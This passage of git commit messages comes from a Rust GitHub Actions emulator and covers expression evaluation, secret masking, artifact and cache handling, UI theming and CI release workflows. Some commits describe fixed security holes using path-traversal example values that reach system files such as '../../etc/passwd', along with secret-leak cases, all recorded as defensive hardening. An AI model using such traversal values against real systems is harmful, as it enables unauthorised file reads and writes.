secret_masker through so secrets actually work in reusable
workflows.
While at it, the matrix job path had a lingering TODO where
job-level env values like `MY_VAR: ${{ matrix.os }}` were
inserted raw without expression substitution. Wire up
preprocess_expressions with the matrix combination context so
these actually resolve. Collect resolved values before
insertion to dodge the borrow checker, which rightfully
complains about mutating job_env while reading from it.
Also add a fast-path to CacheStore::find_by_prefix that checks
the exact key hash before scanning the entire cache directory,
and add integration tests that exercise the artifact upload/
download, cache miss-defer-flush-restore, needs.* context,
step outcome/conclusion, and secrets.* expression paths through
the actual execution wiring — not just the isolated helpers.
* fix(executor): close security holes and correctness bugs from review
The code review turned up some genuinely scary stuff. Let's go
through it.
The artifact download had an unwrap_or(&file_path) fallback that
meant if strip_prefix failed for *any* reason, we'd pass the
absolute file path to Path::join — which silently replaces the
base. So target.join("/etc/passwd") gives you "/etc/passwd".
That's an arbitrary file write. Not great.
The upload side was also doing strip_prefix against the
non-canonical workspace path while the security filter used the
canonical one. Inconsistent canonicalization is how you get path
traversal bugs. Use canonical paths for both.
success() was implemented as `job_status != "failure"`, which
means it returns true when the job is *cancelled*. In real GHA,
success() and cancelled() are mutually exclusive. This also meant
both could be true simultaneously, which is just nonsensical.
The workflow command parser had no URL-decoding at all. GHA
percent-encodes newlines, colons, and percent signs in command
values. Without decoding, ::add-mask:: masks the encoded form
while the actual secret appears unmasked in logs. That's a secret
leak.
Condition evaluation was defaulting to true on parse errors,
silently running steps that should be skipped. A typo in an if:
condition should not mean "yes please run this." Default to false.
secrets: inherit was logging a "not yet supported" warning and
then doing absolutely nothing. Now it actually propagates the
parent secrets to the child workflow, which is what it's supposed
to do.
While at it: filter .cache_key metadata from cache restore,
remove the phantom jobs.*.result context that doesn't exist in
real GHA, make aggregate_reusable_workflow_outputs deterministic,
fix walk_files silently swallowing errors, reject empty
set-output/save-state names, add missing annotation fields, and
stop preprocess_with_value from returning raw ${{ }} templates
on error.
* fix(executor): fix decode ordering, multi-path cache, and missing tests
The decode_value() function in workflow_commands.rs was decoding %25
(percent) *first* in the replacement chain. This means an input like
%250A would first become %0A, and then the next replacement would
happily turn that into a newline. Classic double-decode bug — the
kind of thing that looks correct until someone actually sends a
literal percent sign through the system.
Move %25 decoding to the *end* of the chain, matching what GitHub
Actions actually does.
While at it, actions/cache's `path` input supports multiple
newline-separated paths (e.g. "node_modules\n~/.npm"), but we were
passing the raw multi-line string as a single path. The second path
would just silently not get cached. Fix this by splitting on
newlines and saving/restoring each path independently. The cache
store now uses a composite (key, path) hash so multiple paths under
the same key don't stomp on each other.
Also add the tests that should have been there from the start:
download-artifact path traversal rejection, download-all-artifacts
flow, cache empty key/path validation, cache multi-path deferred
save, and the double-decode regression test.
* fix(executor): close correctness, security, and async safety gaps from review
The PR review turned up a frankly embarrassing number of issues
across the GHA emulation stack. Let's go through the highlights.
The expression evaluator had *multiple* correctness bugs: toJSON()
was emitting unescaped strings (producing invalid JSON), format()
was doing sequential replacements so arg content could be consumed
by later placeholders, fromJSON() was using trim_matches('"')
which strips quotes greedily from both ends, and github.event.*
nested context access silently returned Null because of an overly
strict parts.len() == 2 guard. All fixed.
The secret masker was leaking the first and last characters of
every secret longer than 8 bytes. This is not how you do secret
masking. Replaced with fixed *** output matching GHA behavior.
Also fixed byte/char length confusion on multi-byte secrets,
sorted secrets longest-first to handle overlapping matches, and
added the missing aws_secret and api_key checks to
has_secret_patterns().
Three std::process::Command calls in the Rust action handler were
blocking the tokio runtime. Under parallel matrix execution this
would starve the thread pool. Replaced with tokio::process::Command.
Cache saves were non-atomic — if the process died mid-copy, both
old and new entries were lost. Now writes to a .tmp dir first and
renames into place. While at it, made all .cache_key references
use the CACHE_KEY_METADATA_FILE constant instead of hardcoding the
string in three places.
Other fixes: workflow command parser was trim()ing lines (GHA only
recognizes commands at column 0), INPUT_* env vars were being
logged in verbose output without masking, local reusable workflow
paths had no traversal validation, artifact names with null bytes
were silently stripped instead of rejected, hashFiles() wasn't
checking for symlink traversal, and workflow_commands was
unnecessarily pub.
* fix(executor): fix UTF-8 corruption in expression tokenizer and format()
It turns out the expression tokenizer was storing its input as `&[u8]`
and happily casting individual bytes to `char` via `u8 as char`. This
works fine for ASCII, which is *most* of what GHA expressions contain.
But the moment someone puts a multi-byte UTF-8 character inside a
string literal — say, `format('{0} → {1}', 'a', 'b')` — each byte
of `→` (0xE2 0x86 0x92) gets treated as a separate Latin-1 character.
The arrow becomes `â\u{86}\u{92}`. Not great.
The same bug existed in the `format()` builtin, which iterated
`fmt.as_bytes()` and did the same `u8 as char` dance.
Fix both: change the `Tokenizer` to store `&str` instead of `&[u8]`,
use proper char-aware iteration in `read_string()` (advancing by
`ch.len_utf8()` instead of always 1), and rewrite the `format()`
replacement loop to use `char_indices()`. All the ASCII-only paths
(operators, identifiers, numbers) still use byte-level access since
they only care about ASCII — no performance regression there.
While at it, fix an unnecessary `String::clone` per comparison in
`aggregate_reusable_workflow_outputs` where `sort_by_key` was
cloning the key string. `sort_by(|a, b| a.0.cmp(b.0))` does the
same thing without the allocation.
* refactor(executor): introduce JobServices struct, fix async mutex misuse
The review found that every function in the job/step execution
hierarchy was threading 5-6 individual parameters (secrets_context,
needs_context, needs_results, artifact_store, cache_store) through
their signatures, leading to 15+ argument functions peppered with
#[allow(clippy::too_many_arguments)].
This is not great.
Introduce a JobServices<'a> struct that groups those five fields
into a single borrowing container. JobExecutionContext,
MatrixExecutionContext, and StepExecutionContext all now carry a
`services: JobServices<'a>` instead of five separate fields. The
net result is ~20 fewer lines despite adding a new struct, because
the call sites got dramatically simpler.
While at it, fix the pending_cache_saves Mutex: it was using
std::sync::Mutex in async context. It worked *only* because the
lock was never held across an await point, but that's the kind of
thing that breaks silently the moment someone adds an await inside
the critical section. Switch to tokio::sync::Mutex so the compiler
will actually stop you from doing something stupid.
Also improve CacheStore::new() to fall back to $HOME when
dirs::home_dir() returns None (hello, minimal Docker containers),
and document the github.event.* env-var approximation limitation
in expression.rs so nobody has to rediscover it the hard way.
* fix(executor): address review findings — cache safety, mask perf, missing tests
The cache save_inner claimed to do an "atomic swap" via remove_dir_all
followed by rename. It turns out that two operations are not, in fact,
one operation. If the process dies between the remove and the rename,
the cache entry is just *gone* and the temp dir is orphaned.
Fix the save path to rename-aside-then-swap: old entry goes to `.old`,
`.tmp` renames into place, then `.old` gets cleaned up. Still not truly
atomic (POSIX doesn't give us that for directories), but the window
where the entry is absent is now minimal rather than guaranteed.
While at it, fix three other review findings:
- SecretMasker::mask() was cloning and sorting all secret pairs on
*every single call*. Cache the sorted pairs behind an Option that
invalidates on mutation. The read-path fast-path avoids the write
lock entirely.
- evaluate_condition_with_context now says "failed to parse" instead
of "failed to evaluate" when a condition errors, so users can
actually tell the difference between "your condition is false" and
"your condition is broken syntax and we're skipping your step."
- aggregate_reusable_workflow_outputs silently overwrote colliding
keys from different jobs. Now it warns when that happens, because
non-deterministic output clobbering deserves at least a log line.
Add unit tests for build_needs_context filtering, output key collision
behavior, and empty-input edge cases.
* fix(executor): close correctness, perf, and architecture gaps from review
The PR review turned up a nice collection of things that were either
wrong, wasteful, or unnecessarily messy. Let's go through them.
current_dir().unwrap_or_default() in execute_matrix_job was silently
producing an empty PathBuf on failure, which would then quietly
poison every expression resolution downstream. That's not error
handling, that's *wishful thinking*. Propagate the error properly.
toJSON() had hand-rolled string escaping that missed control chars,
null bytes, and who knows what else. We already depend on serde_json
— just use serde_json::to_string() like a normal person.
SecretMasker::mask() was deep-cloning the entire sorted_pairs Vec on
every single call. With 100 secrets that's ~6KB of allocation per
log line. Wrap it in Arc so the clone is an atomic refcount bump.
pending_cache_saves used tokio::sync::Mutex despite never being held
across an await point. Switch to std::sync::Mutex — no async overhead
for what is fundamentally a synchronous lock-push-unlock pattern.
resolve_job_outputs was silently swallowing expression evaluation
errors and returning empty strings. Now it logs a warning so you
at least have a prayer of debugging broken output references.
The local-file and remote-file branches of execute_reusable_workflow_job
had ~80 lines of duplicated code for env setup, secrets propagation,
batch execution, and result aggregation. Extract run_called_workflow()
so we stop maintaining the same logic in two places that will
inevitably diverge.
While at it, fold secret_manager and secret_masker into JobServices
to reduce the parameter sprawl. Mark with_mask_char as #[cfg(test)]
since create_mask always produces "***". Add tests for toJSON with
control chars, multi-path cache restore, and missing step references.
* fix(executor): close review findings — decode gaps, path hardening, refactor
The PR review caught several real issues that needed addressing.
First, decode_value() in the workflow commands parser was missing
%2C (comma) and %3B (semicolon) from its percent-decoding table.
GitHub Actions encodes these in command parameter values, so any
annotation with a comma in the file path would silently corrupt
the value. Not great when your whole job is to parse these things.
Second, the download-artifact path traversal check was using
unwrap_or_else on a failed canonicalize of the *workspace itself*,
falling back to a potentially-relative path as the safety baseline.
If the workspace path was somehow non-canonical, the starts_with
check becomes meaningless. Now it rejects outright if the workspace
can't be canonicalized.
Third, add_secret was using chars().count() for the min_length
check, which counts Unicode scalar values rather than bytes. This
was an unintentional behavior change from the original len() — a
2-char emoji string at 8 bytes would get rejected despite being
substantial. Reverted to len().
While at it, extracted the three inline action handlers
(upload-artifact, download-artifact, cache) from the 300+ line
execute_step match chain into dedicated handle_* functions. The
function was getting *unwieldy* and this makes each handler
independently testable.
Added tests for: condition parse-error → false behavior change,
format() out-of-bounds placeholders, format() no double-substitution,
%2C/%3B decoding, download-all with empty store, and
process_workflow_commands edge cases.
|
||
|
|
0cb27a5484 |
fix(executor): propagate step outputs and resolve env expressions in composite actions (#87)
* fix(executor): propagate step outputs and resolve env expressions in composite actions
It turns out that execute_composite_action was passing an *empty*
step_outputs map to every single composite step. So when
dtolnay/rust-toolchain step 1 wrote toolchain=stable to
GITHUB_OUTPUT, step 6 asked for ${{ steps.parse.outputs.toolchain }}
and got... nothing. Confusion ensues.
But wait, there's more. Step env values containing ${{ }} expressions
(like `toolchain: ${{inputs.toolchain}}`) were never run through the
expression evaluator either. They were shoved into the environment
as literal strings. So the shell variable $toolchain ended up being
the literal text "${{inputs.toolchain}}", which bash was *not*
thrilled about.
Two fixes: (1) maintain a composite_step_outputs map and call
apply_step_environment_updates after each composite step, exactly
like normal job execution already does, and (2) run
preprocess_expressions on step env values before inserting them.
Both of these should have been there from the start.
* fix(executor): detect local composite actions in prepare_action
It turns out that prepare_action() never actually *checked* whether
a local action (uses: ./) was composite. If there was no Dockerfile
it just shrugged and returned PreparedAction::Image("node:20-slim"),
which meant every local composite action silently fell through to
the "echo 'Local action executed'" placeholder.
The composite detection code only existed in the *remote* action
resolution path, so local composite actions were completely broken.
All that nice step-output propagation work? Never reached.
Parse action.yml in the local-action branch and return
PreparedAction::Composite when runs.using == "composite". This is
the same check the remote path already does via action_resolver.
* fix(executor): appease clippy approx_constant lint in test
Using 3.14 as a test value triggers clippy's approx_constant lint
because it's too close to std::f64::consts::PI. Changed to 3.15
which tests the exact same formatting path without making clippy
throw a fit about mathematical constants.
* refactor(executor): hoist action.yml parsing in prepare_action
The local-action branch of prepare_action had the exact same
four-line read-and-parse block copy-pasted in both the Dockerfile
and non-Dockerfile paths. Two copies of the same code, doing the
same thing, for no reason.
Move the action.yml/action.yaml parsing above the Dockerfile
existence check so both branches share a single `definition`
binding. Same behavior, less duplication, one fewer place to
forget to update when something inevitably changes.
|
||
|
|
975b340f13 |
feat(executor): add GitHub Actions expression evaluator (#86)
* feat(executor): add GitHub Actions expression evaluator
Add a full expression evaluator for GitHub Actions `${{ }}` syntax,
replacing the regex-only substitution that failed on complex expressions
like those in dtolnay/rust-toolchain.
- Add `inputs.*`, `github.*`, `runner.*` context substitution patterns
- Build recursive-descent expression evaluator with support for:
- Operators: `==`, `!=`, `<`, `<=`, `>`, `>=`, `&&`, `||`, `!`
- String/number/boolean/null literals with GHA-compatible truthiness
- Context resolution: inputs, env, github, runner, matrix, steps
- Built-in functions: contains, startsWith, endsWith, format,
success, failure, always, cancelled
- Integrate evaluator into substitution pipeline for complex expressions
- Replace hardcoded `evaluate_job_condition` with evaluator for `if:`
- Add missing RUNNER_OS, RUNNER_ARCH, RUNNER_NAME env vars
- Add catch-all fallback to prevent bash "bad substitution" errors
* fix(executor): fix correctness bugs in expression evaluator
The expression evaluator landed with a few landmines worth defusing
before they bite someone in production.
First, the EXPRESSION_FALLBACK regex used [^}]* to match expression
content, which breaks the *moment* someone uses format placeholders
like {0} inside an expression. The single } in {0} would terminate
the match early, producing garbage. Fix the regex to
(?:[^}]|\}[^}])* so it only stops at the actual }} delimiter.
Second, NaN was truthy. In IEEE 754, NaN != 0.0 is true, so
is_truthy() would happily report NaN as truthy. GitHub Actions
disagrees. Add !n.is_nan() to match the spec. While at it, guard
to_output_string() with n.is_finite() before the as-i64 cast to
prevent overflow on non-finite values.
Third, preprocess_fallback was dead code — evaluate_remaining_
expressions completely replaced its role in the pipeline. Remove it
and its tests rather than leaving a function that exists only to
confuse future readers.
* refactor(executor): route all expressions through the evaluator
The expression evaluator was added in
|
||
|
|
f650f5533c |
feat(ui): overhaul TUI and CLI output (#85)
* feat(ui): overhaul TUI and CLI output for professional look The terminal UI looked like it was thrown together during a hackathon. Colors were hardcoded across 11 files with zero consistency — Color::Green here, Color::Cyan there, emoji like ✅ and ❌ mixed with Unicode symbols like ○ and ⟳, tab dividers using a raw pipe character. This is not great. The core problem was the complete absence of any centralized theming. Every view file was its own little island of ad-hoc styling decisions, and the non-TUI CLI output had *zero* color support despite the colored crate sitting right there in the workspace Cargo.toml, imported by absolutely nobody. So let's fix all of that: - Add theme.rs as single source of truth for colors, styles, symbols, and block/badge helpers. Every view now imports from here instead of hardcoding Color:: literals everywhere. - Replace the inconsistent emoji zoo (✅❌⏭⟳) with proper single-cell-width Unicode symbols (✔✖⊘◉○) that don't render at double width and break column alignment. - Upgrade ratatui 0.23 -> 0.28 and crossterm 0.26 -> 0.28, migrating all the breaking API changes (Frame generics gone, Table::new signature, f.size() -> f.area()). - Add cli_style.rs and wire colored output through all CLI paths — validate, execute, and list commands now have proper colored output with tree-style rendering. - Add braille spinner animation for running workflow states. - Rip out the redundant instruction headers from workflows and logs tabs (the status bar already shows the same hints), reclaiming vertical space. - Clean up the help tab from emoji section headers to properly styled underlined headers with fixed-width key columns. Net result: -418 lines. The UI got *better* and *smaller*. * fix(ui): replace fragile string-matching in status toast with typed severity The status bar was detecting success/error toasts by doing substring matching on the message text — checking for "success", "Success", and the ✔ symbol. It turns out that any message containing the word "success" anywhere (even in an error context) would render with a green background. This is not great. Add a StatusSeverity enum and a set_success_message() helper so callers declare intent explicitly instead of hoping their message text passes a regex-by-vibes check. Also replace the last ✅ emoji in set_status_message calls and swap the double-width 🔒 (U+1F512) LOCK symbol for single-width ⚿ (U+26BF), because the whole point of the theme overhaul was to kill double-width emoji. * fix(ui): align log detection with new Unicode symbols and clean up API The previous commits replaced all user-facing emoji with single-cell Unicode symbols, but *forgot* to update the two places that actually match against those symbols: LogFilterLevel::matches() and log_processor's type detection. So we had the delightful situation where cli_style outputs ✖ on errors, but the log filter is still looking for ❌. The text-based fallbacks ("Error", "WARN", etc.) masked the breakage, but the symbol branches were effectively dead code. While at it, rename set_status_message() to set_error_message() because a generic "set status" method that silently defaults to Error severity is a trap waiting to happen. Both existing call sites are genuine error paths, so the rename is accurate. Also run cargo fmt across the board -- the previous commits left a fair amount of unformatted code behind. * refactor: centralize Unicode symbols into wrkflw-logging The previous commit introduced a proper theme module with Unicode symbols for the TUI, but then three different places independently hardcoded the *same* symbols: theme::symbols, cli_style.rs, and models/mod.rs. Meanwhile, the executor, runtime, and logging crates were still happily emitting double-width emoji into log output. So we had the worst of both worlds: the UI layer had to pattern- match against *both* old emoji and new Unicode to detect log levels, and the "single source of truth" for symbols existed in triplicate. This is not great. Extract a shared `wrkflw_logging::symbols` module that every crate already depends on. theme.rs now re-exports it instead of defining its own copy. cli_style.rs and LogFilterLevel::matches() import from it. All emoji in executor, runtime, and logging are replaced. The old fallback in main.rs error filtering is gone because the executor no longer emits the old symbols. While at it, expand StatusSeverity with Info and Warning variants so "no matches found" shows as a yellow warning toast instead of an angry red error. Because not finding a search result is not an error, it's just disappointing. * fix(ui): stop hammering Docker on every render frame The status bar was calling docker::is_available() on *every single render tick* — that's 4 times per second, each spawning an OS thread, a docker subprocess, and a throwaway tokio runtime. The check has a 3-second timeout, we're calling it every 250ms. This is not great. It turns out that under this kind of self-inflicted load, the check frequently times out and returns false. So Docker shows as "Unavailable" even when it's sitting right there, perfectly happy. The double-nested with_stderr_to_null wrapping wasn't helping either. While at it, the logging crate was also cheerfully eprintln!()-ing warnings while the TUI had the terminal in raw mode, which is how you get "Docker is not available" splattered across the middle of your carefully rendered UI. Confusion ensues. The fix: cache the availability result in App state, seed it from the existing startup check, refresh it every 30 seconds in tick(), and add a quiet_mode flag to the logging crate so it stops writing to stderr while the TUI owns the terminal. Messages still go into the log buffer for the Logs tab — they just don't corrupt the display anymore. |
||
|
|
4c0f890ba7 |
docs: clean up READMEs, remove dead files and bloat (#84)
* docs: gut the documentation bloat and remove dead files The documentation had grown into the kind of sprawling mess where the same feature gets explained three times in three different files, none of which agree with each other. The main README alone was 610 lines of duplicated sections, speculative roadmaps, and verbose limitation disclaimers that nobody reads. Remove 12 files that had no business existing: junk test files (hello.cpp, hello.rs, test.py), duplicate agent configs, a 487-line Podman testing manual, unused asciinema recordings, and 7MB of unreferenced GIF files. Merge the useful bits from GITLAB_USAGE.md into the main README where they belong. Rewrite the main README from 610 lines down to ~170. Every feature is mentioned once, in one place, with one example. The crate README now actually lists all 14 crates instead of pretending secrets doesn't exist. Net result: 3,819 lines deleted, 197 added. The documentation now fits in your head, which is the whole point. * docs: update crate READMEs for latest features and trim secrets The crate READMEs were quietly falling behind the actual code. The executor README didn't mention --job, environment file read-back, or job-level container directives. The UI README didn't mention job selection mode or the tui feature flag. The evaluator README didn't mention composite action input cross-checking. Meanwhile, the secrets README was 387 lines of documentation for a crate whose siblings average 25. It had full provider configuration examples, rate limiting docs, input validation specs, and benchmarking instructions — all of which belong in rustdoc, not a README that's supposed to give you a quick overview. Trim secrets to ~80 lines. Update executor, ui, evaluator, and wrkflw READMEs to reflect features from PRs #77-#83. |
||
|
|
6aa0a380f9 |
feat(executor): add GitHub Actions environment file read-back (#83)
* feat(executor): add GitHub Actions environment file read-back
After each step executes, read back GITHUB_OUTPUT, GITHUB_ENV,
GITHUB_PATH, and GITHUB_STEP_SUMMARY files to enable inter-step
data flow — the single highest-value GHA emulation improvement.
- Add github_env_files module with parser for GHA key-value format
(simple key=value and multiline heredoc key<<DELIMITER)
- Read GITHUB_OUTPUT after each step, store outputs keyed by step ID
- Merge GITHUB_ENV entries into job env for subsequent steps
- Prepend GITHUB_PATH entries to PATH for subsequent steps
- Add ${{ steps.<id>.outputs.<key> }} expression substitution
- Add ${{ env.<name> }} expression substitution
- Extend StepResult with outputs field for parsed step outputs
- Restructure execute_job() loop to allow job_env mutation between
steps using deadline-based timeout instead of async block wrapper
* fix(executor): fix env file read-back bugs and deduplicate post-step logic
The previous commit added environment file read-back but had a few
issues that would bite in real workflows.
First, the heredoc parser was checking for `<<` before checking for
`=`, which means a value like `url=https://example.com/path<<EOF`
would be misinterpreted as a heredoc start. The fix is obvious: the
key before `<<` must actually be a valid identifier, not just "any
non-empty string". Add is_valid_identifier() to enforce that.
Second, GITHUB_ENV and GITHUB_PATH files were never truncated between
steps. Since we read and merge their *entire* contents after each
step, step 2 would re-process step 1's entries, causing duplicate
PATH entries to accumulate O(n²) with each step. We already merge
into job_env which is the source of truth — just truncate all three
files after read-back.
Third, the ~25 lines of post-step read-back logic were copy-pasted
between execute_job and execute_matrix_job. Extract into
apply_step_environment_updates() so there's exactly one place to
maintain this.
While at it, add tests for the heredoc ambiguity, unterminated
heredocs, the apply helper, and — most importantly — a multi-step
test that verifies PATH entries don't duplicate across steps.
* fix(executor): remove dead StepResult.outputs field and fix timeout regression
The previous commit added an `outputs: HashMap<String, String>` field
to StepResult, but *never actually populated it* — every single
construction site (all 20 of them) just sets it to HashMap::new().
The real step outputs live in step_outputs_map inside the job loop,
completely bypassing this field.
A dead field that looks like it should contain data is worse than no
field at all. It's a trap for the next person who tries to read step
outputs through the obvious API. Remove it.
While at it, fix two issues in the execute_job timeout refactor:
The pre-loop `remaining.is_zero()` check was redundant — passing
Duration::ZERO to tokio::time::timeout already does the right thing.
Having both just produced duplicate log messages.
More importantly, the old timeout handler returned the timeout
reason in JobResult.logs. The refactored version just broke out of
the loop and lost that context entirely. Preserve it.
Also document why clear_step_files intentionally skips
GITHUB_STEP_SUMMARY (it's cumulative across steps in real GHA).
* fix(runtime): fix emulation command execution mangling bash -c scripts
It turns out the emulation runtime was joining the entire command
array into a single string and passing it to `sh -c`. This means
`bash -c <multiline-script>` became `sh -c "bash -c word1 word2
..."`, where sh happily re-split the script into separate words and
bash's -c only got the first one.
The result: every `run:` step *appeared* to succeed (exit 0) but
the actual script body never executed properly. Redirects like
`>> $GITHUB_OUTPUT` were captured by the outer sh instead of the
inner bash, so environment file write-back silently wrote garbage.
Fix this by executing known interpreters (bash, sh, python, pwsh)
directly via Command::new(cmd[0]).args(&cmd[1..]), preserving the
script as a single argument. Unknown commands still fall back to
sh -c for shell builtin and pipeline support. This also collapses
the three separate code paths (simple commands, cargo, fallback)
into one unified path, which is just less code to get wrong.
While at it, fix a second bug in apply_step_environment_updates
where GITHUB_PATH entries would clobber the entire PATH with just
the new entries when job_env had no PATH key yet. Fall back to the
system PATH instead of empty string so subsequent steps can still
find bash. Kind of important.
* fix(runtime): handle absolute interpreter paths and restore CI_PROJECT_DIR substitution
The previous emulation refactor matched command[0] against bare names
like "bash" and "cargo", which means /usr/bin/bash or /bin/sh would
fall through to the sh -c wrapper — silently reintroducing the exact
argument-mangling bug that refactor was supposed to fix.
Extract the basename via Path::file_name() before matching. This is
the obvious thing to do and I'm mildly annoyed it wasn't done the
first time around.
While at it, restore the ${CI_PROJECT_DIR} interpolation in env vars
that got quietly dropped during the three-code-path consolidation.
The old code only special-cased CARGO_HOME, but the real issue is
broader: *any* env var value containing ${CI_PROJECT_DIR} needs
interpolation. The new version handles all of them uniformly.
Also add a comment explaining why composite actions get an empty
step_outputs map — it's intentional (matches GHA scoping rules),
not a TODO someone should "fix" later.
* fix(executor): add timeout enforcement to matrix jobs and clean up review nits
execute_matrix_job had *no* timeout enforcement whatsoever. The
regular execute_job path got the per-step deadline treatment in
|
||
|
|
6016887a3b |
feat(executor): easy GHA emulation fixes for better compatibility (#82)
* feat(executor): add easy GHA emulation fixes for better compatibility
- Expand github.* context with 13 missing env vars (CI, GITHUB_ACTIONS,
GITHUB_REF_NAME, GITHUB_REF_TYPE, GITHUB_REPOSITORY_OWNER, etc.) and
improve GITHUB_ACTOR to use git config / $USER instead of hardcoded value
- Enforce timeout-minutes at both job level (default 360m per GHA spec)
and step level via tokio::time::timeout
- Implement defaults.run.shell and defaults.run.working-directory with
proper fallback chain: step > job defaults > workflow defaults > bash
- Implement hashFiles() expression function with glob matching, sorted
file hashing (SHA-256), and integration into the substitution pipeline
* fix(executor): harden hashFiles, working-directory, and shell -e
Three issues from code review, all in the "we got the GHA emulation
*almost* right" category:
1. hashFiles() was returning an empty string when no files matched.
GHA returns the SHA-256 of empty input (e3b0c44...), not nothing.
An empty string as a cache key component is the kind of thing
that silently ruins your day. Also, unreadable files were being
skipped without a peep — now we at least warn about it.
2. The working-directory default resolution was doing a naive
Path::join with user-controlled input. If someone writes
`working-directory: ../../../etc` or an absolute path, join
happily replaces the base. Inside a container this is *somewhat*
contained, but in emulation mode it's a real path traversal.
Normalize the path and reject anything that escapes the
workspace.
3. The bash -e flag change (correct per GHA spec) was undocumented.
Scripts that relied on intermediate commands failing without
aborting the step will now break. Document it in
BREAKING_CHANGES.md so users aren't left guessing.
* fix(executor): complete the GHA shell invocation and harden hashFiles
The previous commit added `-e` to bash but stopped there, even
though the BREAKING_CHANGES.md *literally documented* the full GHA
invocation as `bash --noprofile --norc -e -o pipefail {0}`. So we
were advertising behavior we weren't actually implementing. This is
not great.
Without `-o pipefail`, piped commands like `false | echo ok` would
silently succeed, which is exactly the kind of divergence that makes
you distrust an emulator. And without `--noprofile --norc`, user
profile scripts can interfere with reproducibility.
While at it, fix hashFiles error handling — it was silently
swallowing read errors and producing a partial hash, which is worse
than failing because you get a *wrong* cache key with no indication
anything went sideways. preprocess_hash_files and
preprocess_expressions now return Result and the engine surfaces
failures as step errors.
Also add the tests that should have been there from the start:
shell invocation flags, working-directory path traversal rejection,
and defaults cascade (step > job > workflow).
* fix(executor): harden hashFiles, timeout, and shell edge cases
The previous round of GHA emulation fixes left a few holes that
would bite you in production:
hashFiles() would happily glob '../../etc/passwd' and hash whatever
it found outside the workspace. It also loaded entire file contents
into memory before hashing, which is *not great* when someone points
it at a large binary artifact. The glob patterns now reject '..'
traversal, and file contents are streamed into the SHA-256 hasher
via io::copy instead.
timeout-minutes accepted any f64 from YAML, including negative
values, NaN, and infinity — all of which make Duration::from_secs_f64
panic. Non-finite and non-positive values now fall back to the GHA
default of 360 minutes.
Unknown shell values were silently accepted with a '-c' fallback.
Now they emit a warning so you at least *know* something is off.
While at it, replaced the hash_files_read_error_returns_err test
that was testing two Ok paths (despite its name) with proper
path-traversal rejection tests.
* fix(executor): fix shadowed timeout_mins and extract sanitization helper
It turns out the job timeout error path was re-reading the *raw*
timeout_minutes value instead of using the already-sanitized one.
If someone set timeout-minutes to NaN or a negative number, the
sanitization would correctly fall back to 360, but the error
message would happily print "Job exceeded timeout of NaN minutes."
Not great.
Extract sanitize_timeout_minutes() so both the job and step
timeout paths use the same logic instead of duplicating the
is_finite/positive/clamp dance. While at it, add proper tests
for NaN, Infinity, negative, zero, and the max clamp — plus a
test that actually exercises the job-level timeout expiry branch,
which previously had zero coverage.
|
||
|
|
040276e40a |
ci: modernize workflows to match mdterm CI pattern (#81)
* ci: modernize workflows to match mdterm CI pattern
Replace monolithic build.yml with split ci.yml (parallel fmt, clippy,
build+test jobs). Update all actions to modern versions (checkout@v4,
dtolnay/rust-toolchain, rust-cache@v2). Overhaul release workflow with
more build targets (musl, aarch64), simpler changelog, and crates.io
publish step.
* ci: fix broken cross-compilation targets and workspace publish
It turns out that the release workflow had a couple of targets that
were never going to work on GitHub-hosted runners.
The aarch64-pc-windows-msvc target needs ARM64 MSVC build tools
that simply aren't installed on windows-latest runners. And the
aarch64-unknown-linux-musl target was configured with
aarch64-linux-gnu-gcc as its linker — which is a *glibc* linker,
not a musl one. The resulting binaries would silently be linked
against glibc, completely defeating the point of a musl build.
Remove both broken targets rather than papering over them with
increasingly fragile cross-compilation hacks. The remaining six
targets are all either native builds or well-supported cross-
compilation (aarch64-linux-gnu with the correct gnu linker).
While at it, fix cargo publish — a bare `cargo publish` from a
workspace root doesn't know how to publish crates in dependency
order. Use cargo-workspaces which actually handles this correctly.
Also restore workflow_dispatch to CI so it can be triggered
manually when needed.
* ci: fix review issues in modernized workflows
The CI and release workflows from the previous modernization had a
few things that were just *not right*.
The CI build job was running `cargo build --release` which is
pointless in CI — we care about correctness and fast feedback, not
optimized binaries. It was also missing `--workspace` on both build
and test, so we were only checking whatever the root workspace
defaults resolved to. Clippy had the same problem — only linting
default features of default members, blissfully ignoring everything
else.
The release workflow had three issues: `git log HEAD` for first
releases only shows a single commit instead of the full history,
`--allow-dirty` on cargo publish silently masks unexpected checkout
state, and the workflow_dispatch trigger got dropped so there's no
way to manually re-run a failed release without pushing a new tag.
Fix all of it. Add --workspace and --all-features where they belong,
drop --release from CI build, fix the changelog range for first
releases, remove --allow-dirty, and restore workflow_dispatch.
* ci(release): harden release workflow against manual dispatch footguns
The release workflow had a bare workflow_dispatch trigger with no
inputs, which means manually re-running a failed release would use
the *branch name* as the tag. The changelog would be wrong, the
release would be named after a branch, and the publish job would
cheerfully push to crates.io regardless. Not great.
Three fixes:
Require a tag input on workflow_dispatch so manual re-runs actually
know what they're releasing. The changelog and release creation now
use inputs.tag || github.ref_name so both paths resolve correctly.
Guard the publish job with an if: startsWith(github.ref,
'refs/tags/v') check, because publishing to crates.io is
irreversible and "oops" is not an acceptable rollback strategy.
While at it, replace the cd-into-directory-and-back tar pattern
with tar -C, because changing directories in a shell script and
hoping you cd back correctly is the kind of thing that works right
up until it doesn't.
* ci: fix workflow_dispatch releasing into the void
The release workflow happily accepts a manual dispatch with any tag
string, then passes it to git log and softprops/action-gh-release
without ever checking if the tag actually *exists* as a git ref.
Confusion ensues — changelog generation silently produces garbage
and the release gets created pointing at nothing useful.
Add a tag validation step that fails fast with a clear error before
any downstream jobs run. Since both build and release already depend
on the changelog job via `needs`, this acts as a proper gate.
While at it, add --all-features to the CI build and test steps so
feature-gated code actually gets compiled and tested, not just
linted by clippy. Having clippy check code that never gets built
is the kind of false confidence that bites you on release day.
* ci(release): tighten tag validation and deduplicate tag resolution
The tag validation step was using `git rev-parse`, which happily
accepts *any* git ref — branches, commit SHAs, you name it. So if
someone created a branch called `v1.0.0` (don't ask), it would
sail right through validation and produce a release pointing at a
branch. Not great.
Switch to `git tag -l` so we only accept actual tags. That's the
whole point of a *tag* validation step.
While at it, hoist the `inputs.tag || github.ref_name` expression
into a workflow-level RELEASE_TAG env var instead of repeating it
in four different places. Also add a comment on the publish job's
`if` guard explaining that excluding manual dispatch is intentional
— because some future maintainer *will* look at that and think
it's a bug.
* ci(release): fix three lurking bugs in release workflow
The release workflow had a few issues that were just waiting to
bite someone at the worst possible time:
The prev_tag selection was grabbing *any* tag sorted by version,
not just version tags. If someone ever pushed a non-v* tag (say,
a test tag or a label), the changelog range would silently use
that as the baseline. Filter for "^v" prefixed tags first.
The cargo-workspaces install was unpinned, which means a breaking
release of that tool would break *our* release pipeline. In a
release workflow. The irony writes itself. Pin to 0.4.2.
